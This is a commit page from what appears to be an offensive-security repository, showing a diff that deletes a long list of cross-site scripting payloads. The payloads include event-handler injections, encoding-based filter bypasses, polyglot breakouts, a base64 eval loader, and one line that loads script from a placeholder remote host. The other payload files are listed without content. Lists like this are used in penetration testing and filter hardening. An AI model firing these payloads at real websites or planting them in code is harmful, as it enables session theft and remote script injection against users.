Projects STRLCPY ticofookfook Commits 8581f419
  • Critical File Uploads/CriticalFilePayload.txt
    Diff is too large to be displayed.
  • XSS/XSS-Latest.txt
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    1  -<svg onload=alert(1)>
    2  -"><svg onload=alert(1)//
    3  -"onmouseover=alert(1)//
    4  -"autofocus/onfocus=alert(1)//
    5  -'-alert(1)-'
    6  -'-alert(1)//
    7  -\'-alert(1)//
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    9  -<x contenteditable onblur=alert(1)>lose focus!
    10  -<x onclick=alert(1)>click this!
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    18  -<x contenteditable onkeydown=alert(1)>press any key!
    19  -<x contenteditable onkeypress=alert(1)>press any key!
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    22  -<x onmousemove=alert(1)>hover this!
    23  -<x onmouseout=alert(1)>hover this!
    24  -<x onmouseover=alert(1)>hover this!
    25  -<x onmouseup=alert(1)>click this!
    26  -<x contenteditable onpaste=alert(1)>paste here!
    27  -<script>alert(1)//
    28  -<script>alert(1)<!–
    29  -<script src=//>
    30  -<script src=//3334957647/1>
    31  -%3Cx onxxx=alert(1)
    32  -<%78 onxxx=1
    33  -<x %6Fnxxx=1
    34  -<x o%6Exxx=1
    35  -<x on%78xx=1
    36  -<x onxxx%3D1
    37  -<X onxxx=1
    38  -<x OnXxx=1
    39  -<X OnXxx=1
    40  -<x onxxx=1 onxxx=1
    41  -<x/onxxx=1
    42  -<x%09onxxx=1
    43  -<x%0Aonxxx=1
    44  -<x%0Conxxx=1
    45  -<x%0Donxxx=1
    46  -<x%2Fonxxx=1
    47  -<x 1='1'onxxx=1
    48  -<x 1="1"onxxx=1
    49  -<x </onxxx=1
    50  -<x 1=">" onxxx=1
    51  -<http://onxxx%3D1/
    52  -<x onxxx=alert(1) 1='
    53  -<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
    54  -'onload=alert(1)><svg/1='
    55  -'>alert(1)</script><script/1='
    56  -*/alert(1)</script><script>/*
    57  -*/alert(1)">'onload="/*<svg/1='
    58  -`-alert(1)">'onload="`<svg/1='
    59  -*/</script>'>alert(1)/*<script/1='
    60  -<script>alert(1)</script>
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    65  -<math><brute href=javascript:alert(1)>click
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    71  -<form><input formaction=javascript:alert(1) type=image src=SOURCE>
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    75  -<svg><script xlink:href=data:,alert(1) />
    76  -<math><brute xlink:href=javascript:alert(1)>click
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    85  -GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
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    87  -"><script src=data:&comma;alert(1)//
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    89  -"><script src=//;1.js&num;
    90  -<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
    91  -"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
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    93  -<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
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    102  -<br><br><br><br><br><br><x id=x>#x
    103  -<body onresize=alert(1)>press F12!
    104  -<body onhelp=alert(1)>press F1! (MSIE)
    105  -<marquee onstart=alert(1)>
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    111  -<form onsubmit=alert(1)><input type=submit>
    112  -<select onchange=alert(1)><option>1<option>2
    113  -<menu id=x contextmenu=x onshow=alert(1)>right click me!
    114  - 
    115  - 
  • XSS/XSS2.txt
    Diff is too large to be displayed.
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